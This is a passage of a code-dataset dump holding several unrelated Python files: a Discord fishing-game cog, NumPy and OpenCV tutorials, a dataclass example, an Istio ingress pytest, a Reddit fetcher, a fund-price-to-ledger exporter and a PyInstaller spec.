**{fishdata.fishy}**\\n\"\n                f\"Fishy gifted: **{fishdata.fishy_gifted}**\\n\"\n                f\"Total fish count: **{total}**\\n\\n\"\n                f\"Biggest fish: **{fishdata.biggest} kg**\\n\"\n                f\"Average fishy: **{fishdata.fishy / total:.2f}**\\n\\n\"\n                f\"Trash: **{fishdata.trash}** - {(fishdata.trash / total) * 100:.1f}%\\n\"\n                f\"Common: **{fishdata.common}** - {(fishdata.common / total) * 100:.1f}%\\n\"\n                f\"Uncommon: **{fishdata.uncommon}** - {(fishdata.uncommon / total) * 100:.1f}%\\n\"\n                f\"Rare: **{fishdata.rare}** - {(fishdata.rare / total) * 100:.1f}%\\n\"\n                f\"Legendary: **{fishdata.legendary}** - {(fishdata.legendary / total) * 100:.1f}%\\n\"\n            )\n\n        await ctx.send(embed=content)\n\n\nasync def fish_common(ctx, user, gift):\n    amount = random.randint(1, 29)\n    if amount == 1:\n        await ctx.send(\n            f\"Caught only **{amount}** fishy \"\n            + (f\"for **{user.name}**\" if gift else \"\")\n            + \"! :fishing_pole_and_fish:\"\n        )\n    else:\n        await ctx.send(\n            f\"Caught **{amount}** fishies \"\n            + (f\"for **{user.name}**\" if gift else \"\")\n            + \"! :fishing_pole_and_fish:\"\n        )\n    return amount\n\n\nasync def fish_uncommon(ctx, user, gift):\n    amount = random.randint(30, 99)\n    await ctx.send(\n        \"**Caught an uncommon fish\"\n        + (f\" for {user.name}\" if gift else \"\")\n        + f\"!** (**{amount}** fishies) :blowfish:\"\n    )\n    return amount\n\n\nasync def fish_rare(ctx, user, gift):\n    amount = random.randint(100, 399)\n    await ctx.send(\n        \":star: **Caught a super rare fish\"\n        + (f\" for {user.name}\" if gift else \"\")\n        + f\"! :star: ({amount} \"\n        \"fishies)** :tropical_fish:\"\n    )\n    return amount\n\n\nasync def fish_legendary(ctx, user, gift):\n    amount = random.randint(400, 750)\n    await ctx.send(\n        \":star2: **Caught a *legendary* fish\"\n        + (f\" for {user.name}\" if gift else \"\")\n        + f\"!! :star2: ({amount} \"\n        \"fishies)** :dolphin:\"\n    )\n    return amount\n\n\nasync def trash(ctx, user, gift):\n    icon = random.choice(TRASH_ICONS)\n    await ctx.send(\n        f\"Caught **trash{'!' if not gift else ''}** {icon}\"\n        + (f\" for {user.name}!\" if gift else \"\")\n        + \" Better luck next time.\"\n    )\n    return 0\n\n\ndef setup(bot):\n    bot.add_cog(Fishy(bot))\n","sub_path":"cogs/fishy.py","file_name":"fishy.py","file_ext":"py","file_size_in_byte":7891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"22325170","text":"import numpy as np\nimport pandas as pd \nfrom PIL import Image \nfrom io import StringIO \n\n#Questions on NumPy Strings\n# Repeat all the elements of a NumPy array of strings\n# char.multiply Returns Array of strings\nnp.char.multiply(np.array(['a', 'b', 'c', \n                  'd', 'e'], dtype = np.str) , 3) \n\n# How to split the element of a given NumPy array with spaces?\n# split Returns Output Array containing of list objects.\nnp.char.split(np.array(['PHP C# Python C Java C++'], dtype=np.str) )\n\n# How to insert a space between characters of all the elements of a given NumPy array?\n# char.join Returns a string which is the concatenation of the strings in the sequence seq.\nnp.char.join(\" \", ['aaa', 'bbb', 'ccc']) \n\n# Find the length of each string element in the Numpy array\narr = np.array(['New York', 'Lisbon', 'Beijing', 'Quebec']) \narr_len = [len(i) for i in arr] 
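\n# An equivalent vectorised way (a sketch: np.char.str_len applies len()\n# element-wise, so it should agree with the list comprehension above;\n# arr_len_vec is a hypothetical name)\narr_len_vec = np.char.str_len(arr) 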
\n\n# Swap the case of an array of string\n# swapcase Returns lowercased array of str or \n# unicode, depending on input type.\nnp.char.swapcase(np.array(['P4Q R', '4q Rp', 'Q Rp4', 'rp4q']) )\n\n# Change the case to uppercase of elements of an array\n# upper Returns uppercased array of str or unicode, \n# depending on input type.\nnp.char.upper(np.array(['P4Q R', '4q Rp', 'Q Rp4', 'rp4q']) )\n\n# Change the case to lowercase of elements of an array\n# lower Returns Output lowercased array of str or\n# unicode, depending on input type.\nnp.char.lower(np.array(['P4Q R', '4q Rp', 'Q Rp4', 'rp4q']))\n\n# Join String by a separator\n# core.defchararray.join Returns Output array of str or unicode with joined elements.\nnp.core.defchararray.join(['-', '*', ''], ['aaa', 'bbb', 'ccc']) \n\n# Check if two same shaped string arrays are equal, one by one\n# core.defchararray.not_equal Returns array of bools,\n# or a single bool if arr1 and arr2 are scalars.\nnp.char.not_equal(np.array(['aaa', 'bbb', 'ccc']), np.array(['aaa', 'bb', 'ccc']))\n\n# Count the number of substrings in an array\n# count Returns the number of non-overlapping\n# occurrences of substring sub.\nnp.char.count(['aaaa', 'aba', \"bbba\"], 'a')\n\n# Find the lowest index of the substring in an array\n# find Returns array of ints.\nnp.char.find(['aaaa', 'aba', \"bbba\"], 'a')\n\n# Get the boolean array when values end with a particular character\n# endswith Returns the boolean array when values end with a value.\nnp.char.endswith(['aaab', 'aba', \"bbba\"], 'a')\n\n# More Questions on NumPy\n# Different ways to convert a Python dictionary to a NumPy array\nd = {'a': 'a', 'b': 'b', 'c': 'c'}\nnp.array(list(d.items()))\n\nnp.array(list(d.values()))\n\n# How to convert a list and tuple into NumPy arrays?\n# asarray Convert the input to an array.\nnp.asarray([1, 2, 3, 4, 5])\nnp.asarray((1, 2, 3, 4, 5))\n\n# Ways to convert array of strings to array of floats\n# fromstring A new 1-D array initialized from text data in a string.\nnp.array([\"1.1\", \"1.5\", \"2.7\", \"8.9\"]).astype(np.float)\nnp.fromstring('1.1, 1.5, 2.7, 8.9', dtype = np.float, sep =', ' ) \n\n# Convert a NumPy array into a csv file\ndata = np.arange(1,11).reshape(2,5) \ndf = pd.DataFrame(data) \ndf.to_csv(\"dados.csv\")\n\n# How to Convert an image to NumPy array and save it to CSV file using Python?\nimg = Image.open('test.jpg') \nimageToMatrice = np.asarray(img)\n\n# How to save a NumPy array to a text file?\nopen(\"file1.txt\", \"w+\").write(str(np.array([1, 2, 3, 4, 5]) ))
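\n# A more conventional way to do the same (a sketch; np.savetxt writes one\n# element per line, and file2.txt is a hypothetical filename):\nnp.savetxt(\"file2.txt\", np.array([1, 2, 3, 4, 5]))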
\n\n# Load data from a text file\n# loadtxt Returns ndarray\n# StringIO behaves like a file object \nnp.loadtxt(StringIO(\"0 1 2 \\n3 4 5\") ) \n \n# Plot line graph from NumPy array\nimport matplotlib.pyplot as plt \nx = np.arange(1, 11) \ny = x * x \nplt.title(\"Line graph\") \nplt.xlabel(\"X axis\") \nplt.ylabel(\"Y axis\") \nplt.plot(x, y, color =\"red\") \nplt.show()\n\n# Create Histogram using NumPy\n# histogram Compute the histogram of a set of data.\na = np.random.randint(100, size =(50)) \nnp.histogram(a, bins = [0, 10, 20, 30, 40, \n                        50, 60, 70, 80, 90, \n                        100]) \n \nhist, bins = np.histogram(a, bins = [0, 10, \n                                     20, 30, \n                                     40, 50, \n                                     60, 70, \n                                     80, 90, \n                                     100]) \n# printing histogram \nprint() \nprint (hist) \nprint (bins) \nprint() ","sub_path":"NumpyTutorial/Questions on NumPy Strings.py","file_name":"Questions on NumPy Strings.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"36490804","text":"import cv2\nimport numpy as np\n\n\n# load a cascade classifier object from the xml file\nface_cascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\neyes_cascade = cv2.CascadeClassifier(\"haarcascade_eye.xml\")\n\n\nimage = cv2.imread(\"resim.jpg\")\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# detects the faces and returns their coordinates as a list;\n# the 2nd argument scales the image size up, and the 3rd parameter sets how many times the image is scanned\nfaces = face_cascade.detectMultiScale(gray, 1.3, 2)\n\n# loop that encloses every detected face in a rectangle\nfor(x,y,w,h) in faces:\n    cv2.rectangle(image, (x,y), (x+w, y+h), (255,0,0), 2)\n    face_section = image[y:y+h, x:x+w]
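\n    # eyes_cascade is loaded above but never used; a minimal sketch of how it\n    # could be run inside each detected face region (the scale factor and scan\n    # count below are assumptions copied from the face call above):\n    eyes = eyes_cascade.detectMultiScale(gray[y:y+h, x:x+w], 1.3, 2)\n    for (ex, ey, ew, eh) in eyes:\n        cv2.rectangle(face_section, (ex, ey), (ex+ew, ey+eh), (0,255,0), 2)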
\n\n\ncv2.imshow(\"image\", image)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"ders19/face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"382139910","text":"from dataclasses import dataclass, field, InitVar\nfrom typing import List\n\n\n@dataclass\nclass Book:\n    title: str\n    author: str\n    gen_desc: InitVar[bool] = True\n    desc: str = None\n\n    def __post_init__(self, gen_desc: bool):\n        if gen_desc and self.desc is None:\n            self.desc = \"`%s` by %s\" % (self.title, self.author)\n\nbook = Book(title='Test title', author='Test Author', desc='test desc')\nbook2 = Book(title='Test title', author='Test Author')\n\nprint(book == book2)\nprint(book)\n\n\n@dataclass\nclass Bookshelf:\n    books: List[Book] = field(default_factory=list)\n\n\nbookshelf = Bookshelf(books=[book, book2])\n\nprint(bookshelf)\n","sub_path":"python_examples/dataclasses_examples/example_01.py","file_name":"example_01.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"545348074","text":"def LettersAround(s):\n\tflag=True\n\tequal=0\n\tplus=0\n\n\tfor i in range(0,len(s)):\n\t\tif(s[i] == '='):\n\t\t\tequal+=1\n\t\t\tcontinue\n\t\telif(s[i] == '+'):\n\t\t\tplus+=1\n\t\t\tcontinue\n\t\telif(s[i].isalpha()):\n\t\t\tif(0 < i < len(s)-1 and s[i-1] == '+' and s[i+1] == '+'):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tflag = False\n\t\t\t\tbreak\n\tif(flag == True and equal>0 and plus > 0):\n\t\tprint(\"Accepted\")\n\telse:\n\t\tprint(\"Rejected\")\nLettersAround(str(input(\"Enter A String :\")))","sub_path":"SL Lab/SL_Lab_Test1/lettersaround.py","file_name":"lettersaround.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"481201088","text":"import logging\nimport pytest\nimport requests\nimport tempfile\nimport time\n\n\nGATEWAY_HTTPBIN = (\"\"\"\n---\napiVersion: networking.istio.io/v1beta1\nkind: Gateway\nmetadata:\n  name: httpbin-gateway\n  namespace: default\nspec:\n  selector:\n    istio: ingressgateway\n  servers:\n  - hosts:\n    - '*'\n    port:\n      name: http\n      number: 80\n      protocol: HTTP\nEOF\n\"\"\")\n\nGATEWAY_HTTPBIN_SECURE = (\"\"\"\n---\napiVersion: networking.istio.io/v1beta1\nkind: Gateway\nmetadata:\n  name: httpbin-gateway\n  namespace: default\nspec:\n  selector:\n    istio: ingressgateway\n  servers:\n  - port:\n      number: 443\n      name: https\n      protocol: HTTPS\n    tls:\n      mode: SIMPLE\n      credentialName: httpbin-credential\n    hosts:\n    - 'httpbin.example.com'\nEOF\n\"\"\")\n\nVIRTUALSERVICE_HTTPBIN = (\"\"\"\n---\napiVersion: networking.istio.io/v1alpha3\nkind: VirtualService\nmetadata:\n  name: httpbin\nspec:\n  hosts:\n  - '*'\n  gateways:\n  - httpbin-gateway\n  http:\n  - match:\n    - uri:\n        prefix: /status\n    - uri:\n        prefix: /delay\n    route:\n    - destination:\n        port:\n          number: 8000\n        host: httpbin\nEOF\n\"\"\")\n\nISTIO_VERSION = \"1.5\"\nISTIO_VERSION_PATCH = ISTIO_VERSION + \".9\"\nISTIO_URL = \"https://raw.githubusercontent.com/istio/istio/release-\" + ISTIO_VERSION + \"/samples\"\n\ndef _istio_httpbin_setup(kubectl):\n    istioctl = (\"\"\"\n    istioctl --kubeconfig={config} manifest apply \\\n      --set 
profile=default \\\n --set addonComponents.prometheus.enabled=false \\\n --set hub=registry.suse.de/devel/caasp/4.5/containers/containers/caasp/v4.5 \\\n --set tag={version} \\\n --set values.pilot.image=istio-pilot \\\n --set values.global.proxy.image=istio-proxyv2 \\\n --set values.global.proxy_init.image=istio-proxyv2\n \"\"\".format(config=kubectl.get_kubeconfig(), version=ISTIO_VERSION_PATCH))\n\n kubectl.utils.runshellcommand(istioctl)\n kubectl.run_kubectl(\"-n istio-system wait --for=condition=available deploy/istio-ingressgateway --timeout=3m\")\n\n kubectl.run_kubectl(f\"apply -f {ISTIO_URL}/httpbin/httpbin.yaml\")\n\n\ndef _cleanup(kubectl):\n kubectl.run_kubectl(f\"delete -f {ISTIO_URL}/httpbin/httpbin.yaml\")\n istioctl_delete = (\"\"\"\n istioctl --kubeconfig={config} manifest generate \\\n --set profile=default \\\n --set addonComponents.prometheus.enabled=false \\\n --set hub=registry.suse.de/devel/caasp/4.5/containers/containers/caasp/v4.5 \\\n --set tag={version} \\\n --set values.pilot.image=istio-pilot \\\n --set values.global.proxy.image=istio-proxyv2 \\\n --set values.global.proxy_init.image=istio-proxyv2 \\\n | kubectl --kubeconfig={config} delete -f - || true\n \"\"\".format(config=kubectl.get_kubeconfig(), version=ISTIO_VERSION_PATCH))\n kubectl.utils.runshellcommand(istioctl_delete)\n\n\ndef _test_non_TLS(kubectl, worker_ip, logger):\n \"\"\"\n Verify that httpbin service can be accessed through the istio ingress\n \"\"\"\n\n logger.info(\"Create the istio config\")\n kubectl.run_kubectl(\"apply -f - << EOF \" + GATEWAY_HTTPBIN)\n kubectl.run_kubectl(\"apply -f - << EOF \" + VIRTUALSERVICE_HTTPBIN)\n\n # Wait for istio to digest the config\n time.sleep(100)\n\n nodePort = kubectl.run_kubectl(\"-n istio-system get service/istio-ingressgateway -o jsonpath='{ .spec.ports[1].nodePort }'\")\n\n assert 30000 <= int(nodePort) <= 32767\n\n url = \"{protocol}://{ip}:{port}{path}\".format(protocol=\"http\", ip=str(worker_ip), port=str(nodePort), path=\"/status/200\")\n r = requests.get(url, headers={'host': 'httpbin.example.com'})\n\n assert 200 == r.status_code\n\n\ndef _test_TLS(kubectl, worker_ip, logger):\n \"\"\"\n Verify that httpbin service can be accessed through the istio ingress using TLS\n \"\"\"\n # Create a temporary directory for the CA certificate\n temp_dir = tempfile.TemporaryDirectory()\n\n logger.info(\"Create the certificate\")\n openssl_list = [\"openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -subj '/O=example Inc./CN=example.com' -keyout example.com.key -out {directory}/example.com.crt\".format(directory=temp_dir.name),\n 'openssl req -out httpbin.example.com.csr -newkey rsa:2048 -nodes -keyout httpbin.example.com.key -subj \"/CN=httpbin.example.com/O=httpbin organization\"',\n \"openssl x509 -req -days 365 -CA {directory}/example.com.crt -CAkey example.com.key -set_serial 0 -in httpbin.example.com.csr -out httpbin.example.com.crt\".format(directory=temp_dir.name)]\n for cmd in openssl_list:\n kubectl.utils.runshellcommand(cmd)\n\n logger.info(\"Create the secret\")\n kubectl.run_kubectl(\"-n istio-system create secret tls httpbin-credential --key=httpbin.example.com.key --cert=httpbin.example.com.crt\")\n\n logger.info(\"Create the istio config\")\n kubectl.run_kubectl(\"apply -f - << EOF \" + GATEWAY_HTTPBIN_SECURE)\n \n # Wait for istio to digest the config\n time.sleep(60)\n\n secure_nodePort = kubectl.run_kubectl(\"-n istio-system get service/istio-ingressgateway -o jsonpath='{ .spec.ports[2].nodePort }'\")\n\n assert 30000 <= 
int(secure_nodePort) <= 32767\n\n url = \"{protocol}://{ip}:{port}{path}\".format(protocol=\"https\", ip='httpbin.example.com', port=str(secure_nodePort), path=\"/status/200\")\n curl_command = \"(curl -v -HHost:httpbin.example.com --resolve 'httpbin.example.com:{port}:{ip}' \\\n --cacert {directory}/example.com.crt \\\n {url}) 2>&1\".format(port=secure_nodePort, ip=str(worker_ip), directory=temp_dir.name, url=url)\n \n output = kubectl.utils.runshellcommand(curl_command)\n\n assert \"HTTP/2 200\" in output\n\n\ndef test_istio_ingress(deployment, platform, skuba, kubectl):\n logger = logging.getLogger(\"testrunner\")\n logger.info(\"Deploying istio and httpbin\")\n _istio_httpbin_setup(kubectl)\n\n wrk_idx = 0\n ip_addresses = platform.get_nodes_ipaddrs(\"worker\")\n worker_ip = ip_addresses[wrk_idx]\n\n logger.info(\"Testing the non-TLS use case\")\n _test_non_TLS(kubectl, worker_ip, logger)\n\n logger.info(\"Testing now the TLS use case\")\n _test_TLS(kubectl, worker_ip, logger)\n\n _cleanup(kubectl)\n","sub_path":"ci/infra/testrunner/tests/test_istio_ingress.py","file_name":"test_istio_ingress.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"85925603","text":"import asyncio\nimport random\nimport time\nfrom praw.exceptions import ClientException\nfrom prawcore.exceptions import NotFound, ResponseException, Forbidden, Redirect, BadRequest\n#import logging\nimport config\nfrom exceptions import *\nfrom urltype import UrlType\nfrom praw.models import MoreComments, Submission\nConfig = config.Config('config.ini')\n\n\nclass Reddit:\n\n def __init__(self, praw_object):\n self._praw_object = praw_object\n\n async def get(self, **kwargs):\n subreddit = kwargs.get('subreddit', None)\n post_count = int(kwargs.get('post_count', Config.r_postcount))\n image = kwargs.get('get_image', None)\n nsfw = bool(kwargs.get('nsfw', False))\n request_type = kwargs.get('request_type', 'default')\n url = kwargs.get('url', None)\n loop = asyncio.get_event_loop()\n\n if request_type == 'url': # subreddit is set to the url in this case\n\n print(\"Request Type is URL\")\n\n def get_from_url():\n return self.__get_post_from_url(url)\n\n future10 = loop.run_in_executor(None, get_from_url)\n post_data = await future10\n\n return post_data\n\n # if not a url continue with normal post-grabbing\n if post_count > Config.r_maxpostcount:\n post_count = Config.r_maxpostcount\n\n # check if the subreddit exists, using do_req function to keep async shit however it works\n def do_req():\n return self.check_if_sub_exists(subreddit)\n\n # have to do some asyncio shit\n\n future = loop.run_in_executor(None, do_req)\n\n if_sub_exists = await future # should be either True (exists) or False (doesnt exist)\n\n # if subreddit does not exist, raise an error\n if not if_sub_exists:\n raise SubredditNotExist(str(subreddit) + \" does not exist (returned to search page)\")\n\n # check if the sub is nsfw if requested for no nsfw stuff\n\n if not nsfw:\n def nsfw_req():\n return self.check_if_over18(subreddit)\n\n future2 = loop.run_in_executor(None, nsfw_req)\n result = await future2\n\n if result:\n raise SubredditIsNSFW(str(subreddit) + \" is a NSFW subreddit\")\n\n # now time for the fun stuff\n\n # grabbing the posts\n\n def get_the_posts():\n return self.__get_posts(subreddit, post_count, image, nsfw)\n\n future3 = loop.run_in_executor(None, get_the_posts)\n posts = await future3\n\n # check if we actually have posts\n posts_length = 
len(posts)\n if posts_length < 1:\n raise NoPostsReturned(\n \"No Posts Returned for subreddit \" + str(subreddit) + \" with a post count of \" + str(post_count))\n # now we need to randomly grab a post\n\n random_post_num = random.randint(0, posts_length - 1)\n\n # and finally return everything\n\n return posts[random_post_num]\n\n def check_if_sub_exists(self, subreddit):\n \"\"\"\n Check if the subreddit exists\n This is also just where we check for any credential errors etc\n\n :param subreddit:\n :return:\n \"\"\"\n try:\n test = self._praw_object.subreddit(subreddit).new(limit=1)\n next(test)\n return True\n except NotFound:\n return False\n except Forbidden:\n raise RedditForbiddenAccess\n except Redirect:\n return False\n except BadRequest:\n return False\n except ResponseException as e:\n raise RedditOAuthException(e)\n\n def check_if_over18(self, subreddit):\n try:\n if self._praw_object.subreddit(subreddit).over18:\n return True\n return False\n except NotFound:\n # subreddit cannot be checked for 18+\n return False\n\n def __get_posts(self, subreddit, post_count, image, nsfw):\n\n posts = []\n\n for post in self._praw_object.subreddit(subreddit).hot(limit=post_count):\n skip_post = False\n post_url = str(post.url)\n post_author = str(post.author)\n if post.over_18 and not nsfw:\n skip_post = True\n # get the type of post (based on the URL)\n post_type = UrlType(post.domain, post_url, post.subreddit, post.permalink).get_url_type() # TODO - this is a asynced class shit need to fix\n\n # if image is true, only get image based posts\n # if not, only get links and post\n # if None, any post type\n\n if image is not None:\n if image:\n if post_type == \"link\" or post_type == \"reddit\":\n skip_post = True\n else:\n if post_type != \"link\" and post_type != \"reddit\":\n skip_post = True\n\n # skip any posts with a blacklisted author\n if post_author in Config.r_ignore_users:\n skip_post = True\n\n # skip any mod posts if set\n if (post.distinguished == \"moderator\") and Config.r_skip_mod_posts:\n skip_post = True\n\n # skip any stickied posts if set\n if post.stickied and Config.r_skip_stickied_posts:\n skip_post = True\n\n # skip any removed posts\n if post.removal_reason is not None:\n skip_post = True\n\n # save this post\n\n if skip_post is False:\n posts.append(self.__get_post_data(post, post_type, post_url, subreddit))\n\n return posts\n\n def __get_post_from_url(self, url):\n try:\n submission = self._praw_object.submission(url=url)\n except ClientException as e:\n raise InvalidRedditURL(\"Invalid Reddit Submission URL. Details (ClientException): \" + str(e))\n except NotFound as e:\n raise InvalidRedditURL(\"Invalid Reddit Submission URL. Details (NotFound Exception): \" + str(e))\n except Exception as e:\n raise UnknownException(\"Unknown Exception when trying to get submission from URL. Maybe invalid url?\")\n # get post type\n try:\n post_type = UrlType(submission.domain, submission.url, submission.subreddit, submission.permalink).get_url_type()\n except NotFound as e:\n raise InvalidRedditURL(\"Invalid Reddit Submission URL. 
Details (NotFound Exception): \" + str(e))\n\n return self.__get_post_data(submission, post_type, submission.url, str(submission.subreddit))\n\n def __get_post_data(self, post: Submission, post_type, post_url, subreddit):\n \"\"\"\n Get post information from a post from reddit.\n \"\"\"\n # check post length\n post_text = post.selftext\n post_title = post.title\n if len(post_text) > 1850:\n post_text = (post_text[:1850] + ' (...)')\n\n # we also need to check the title length as discord embed titles are limited to 256 characters long\n\n if len(post_title) + len(str(post.domain)) > 256:\n post_title = (post_title[:250 - len(str(post.domain))] + '...')\n\n post_title += f\" [{post.domain}]\"\n created_utc = int(post.created_utc)\n created_utc = time.strftime('%Y-%m-%d %H:%M', time.gmtime(created_utc))\n\n return {'post_id': str(post.id),\n 'post_url': post_url,\n 'post_author': str(post.author),\n 'nsfw': bool(post.over_18),\n 'post_title': str(post_title),\n 'post_score': int(post.score),\n 'post_length': len(post_text),\n 'post_text': post_text,\n 'post_type': post_type,\n 'post_permalink': \"https://reddit.com\" + str(post.permalink),\n 'post_subreddit': post.subreddit,\n 'created_utc': created_utc,\n 'post_preview': str(post.thumbnail),\n 'gilded': int(post.gilded),\n 'domain': str(post.domain)\n\n }\n\n def get_comments_by_list(self, submission_id, **kwargs):\n\n submission = self._praw_object.submission(submission_id)\n return self.process_comments(submission.comments.list()[0:int(kwargs.get('max_comments', len(submission.comments.list())))])\n\n # Where MoreComments is a MoreComments object\n # gets the comments the MoreComments object represents\n def get_more_comments(self, morecomments):\n\n # # See PRAW docs for more info\n # # https://praw.readthedocs.io/en/latest/code_overview/other/commentforest.html#praw.models.comment_forest.CommentForest.replace_more\n \n if isinstance(morecomments, MoreComments):\n comments = morecomments.comments(update=True)\n return self.process_comments(comments)\n\n # Process the comments by editing them (e.g date formatting etc)\n @staticmethod\n def process_comments(comments):\n\n new_comments = []\n \n for comment in comments:\n\n # skip if it is a MoreComments Instance\n if isinstance(comment, MoreComments):\n new_comments.append(comment)\n continue\n\n try:\n\n if comment.author in Config.r_ignore_users:\n continue # skip\n \n if comment.depth > 0: # only want top level comments at this stage\n continue\n\n if Config.r_skip_stickied_comments and str(comment.stickied).lower() == \"true\":\n print(\"Skipping comment as it is stickied\")\n continue\n\n # convert the time to human readable\n comment.created_utc = time.strftime('%Y-%m-%d %H:%M', time.gmtime(\n int(comment.created_utc)))\n\n comment.permalink = \"https://reddit.com\" + str(comment.permalink)\n new_comments.append(comment) \n\n except IndexError:\n pass\n except Exception as e:\n raise UnknownException(str(e) + \" COMMENTS\")\n # TODO: if an exception occurs here, fix it\n\n return new_comments\n\n","sub_path":"reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":10182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"324912285","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# 1. Set the URL\nurl = 'https://finance.naver.com/marketindex/exchangeList.nhn'\n# 2. Send the request\nresponse = requests.get(url).text\n# 3. Parse the response into an HTML document\nsoup = BeautifulSoup(response, 'html.parser')\n# 4. 
Extract the desired content with CSS selectors\ntable = soup.select('body > div > table > tbody > tr')\nname = soup.select('body > div > table > tbody > tr')\n# .select returns a List regardless of the number of matches\n# use .select_one for a single element, or [0] to grab just one element\nfor tr in table:\n print(tr.select('td.tit')[0].text.strip(), tr.select('td.sale')[0].text)","sub_path":"day2/dollar.py","file_name":"dollar.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"262935315","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Exports Avanza fund-data to ledger-cli.\"\"\"\n\nfrom __future__ import print_function\n\nimport io\nimport os\nimport gzip\nimport json\nimport argparse\ntry: # Python 3?\n import http.client as httplib\n from configparser import ConfigParser\nexcept ImportError:\n # pylint: disable=F0401\n import httplib\n from ConfigParser import ConfigParser\nfrom datetime import datetime\n\nPOST_TEMPLATE = {\n \"orderbookIds\": [],\n \"charttype\": \"orderbook\",\n \"parentContext\": \"fund\",\n \"mydate\": [\"Från\", \"Till\"],\n \"timePeriod\": \"month\",\n \"widthOfPlotContainer\": 446,\n \"percentGraph\": True\n}\n\nPOST_HEADERS = {\n \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/json; charset=UTF-8\",\n}\n\ndef output_ledger(funds, data):\n \"\"\"Output price-data for funds in ledger-cli pricedb-format.\"\"\"\n for fund in data.get('graphDataPointSeries'):\n fund_id = int(fund.get('orderbookId'))\n first_day = funds[fund_id]['buying_date']\n points = fund.get('displayablePoints')\n for point in points:\n day = datetime.fromtimestamp(point[2].get('date')/1000)\n if day < first_day:\n continue\n print('P '\n + day.strftime('%Y/%m/%d %H:%M:%S ')\n + funds[fund_id]['commodity_name'] + ' '\n + str(point[2].get('closingPrice')))\n\ndef input_avanza(funds):\n \"\"\"Read data for funds from Avanzas unofficial API.\"\"\"\n POST_TEMPLATE['orderbookIds'] = list(funds.keys())\n post_data = json.dumps(POST_TEMPLATE)\n\n conn = httplib.HTTPSConnection('www.avanza.se')\n conn.request('POST', '/ab/component/flotchart/getchart/orderbook',\n post_data, POST_HEADERS)\n resp = conn.getresponse()\n\n if resp.status != 200:\n print(str(resp.status) + \" \" + resp.reason)\n exit(1)\n\n byte_buf = resp.read()\n if len(byte_buf) > 2 and byte_buf[:2] == b'\\x1f\\x8b':\n comp_buf = io.BytesIO(byte_buf)\n decomp_buf = gzip.GzipFile(fileobj=comp_buf)\n data = json.loads(decomp_buf.read().decode('utf_8'))\n else:\n data = json.loads(resp.read().decode('utf_8'))\n\n return data\n\ndef read_config(filename):\n \"\"\"Read configuration of which funds to fetch data for.\"\"\"\n config = ConfigParser()\n config.read(filename)\n\n funds = dict()\n for fund_sec in config.sections():\n date = datetime.strptime(config.get(fund_sec, 'buying_date'),\n '%Y-%m-%d')\n funds[int(config.get(fund_sec, 'id'))] = dict({\n \"name\": fund_sec,\n \"commodity_name\": config.get(fund_sec, 'commodity_name'),\n \"buying_date\": date\n })\n\n return funds\n\ndef main():\n \"\"\"Main function for when called as an executable.\"\"\"\n parser = argparse.ArgumentParser(\n description='Gets value of funds from Avanza, and outputs them in'\n ' ledger-cli compatible format')\n parser.add_argument('-c', '--config',\n help='Configuration file with funds. 
Defaults to'\n ' ~/.avanza2ledger.ini')\n args = parser.parse_args()\n\n if args.config:\n funds = read_config(args.config)\n else:\n funds = read_config(os.path.expanduser('~/.avanza2ledger.ini'))\n\n data = input_avanza(funds)\n output_ledger(funds, data)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"avanza2ledger.py","file_name":"avanza2ledger.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"308237210","text":"# -*- mode: python -*-\n# coding: utf-8\nblock_cipher = None\n\na = Analysis(\n ['./tickeys/run.py'],\n pathex=['./tickeys'],\n binaries=[\n ('lib/32/libmodplug.so.1',\".\"),\n ('lib/32/libSDL2_ttf-2.0.so.0',\".\"),\n ('lib/32/libSDL2_image-2.0.so.0',\".\"),\n ('lib/32/libSDL2_mixer-2.0.so.0',\".\"),\n ('lib/32/libSDL2-2.0.so.0',\".\"),\n ('lib/32/libsndio.so.6.0',\".\"),\n ], # shared libraries\n datas=[(\"./tickeys/tickeys.png\",\".\")], # data files; can be any file type, e.g. ini config files, fonts, images\n hiddenimports=['six','packaging', 'packaging.version', 'packaging.specifiers'],\n hookspath=None,\n runtime_hooks=None,\n excludes=None,\n win_no_prefer_redirects=None,\n win_private_assemblies=None,\n cipher=block_cipher)\na.datas += Tree(\"./tickeys/Resources\", prefix = \"Resources\")\na.datas += Tree(\"./tickeys/kivy\", prefix = \"kivy\")\na.datas += Tree(\"./tickeys/locale\", prefix = \"locale\")\npyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n name='Tickeys',\n debug=False,\n strip=None,\n upx=True,\n console=True\n )\n","sub_path":"build32.spec","file_name":"build32.spec","file_ext":"spec","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
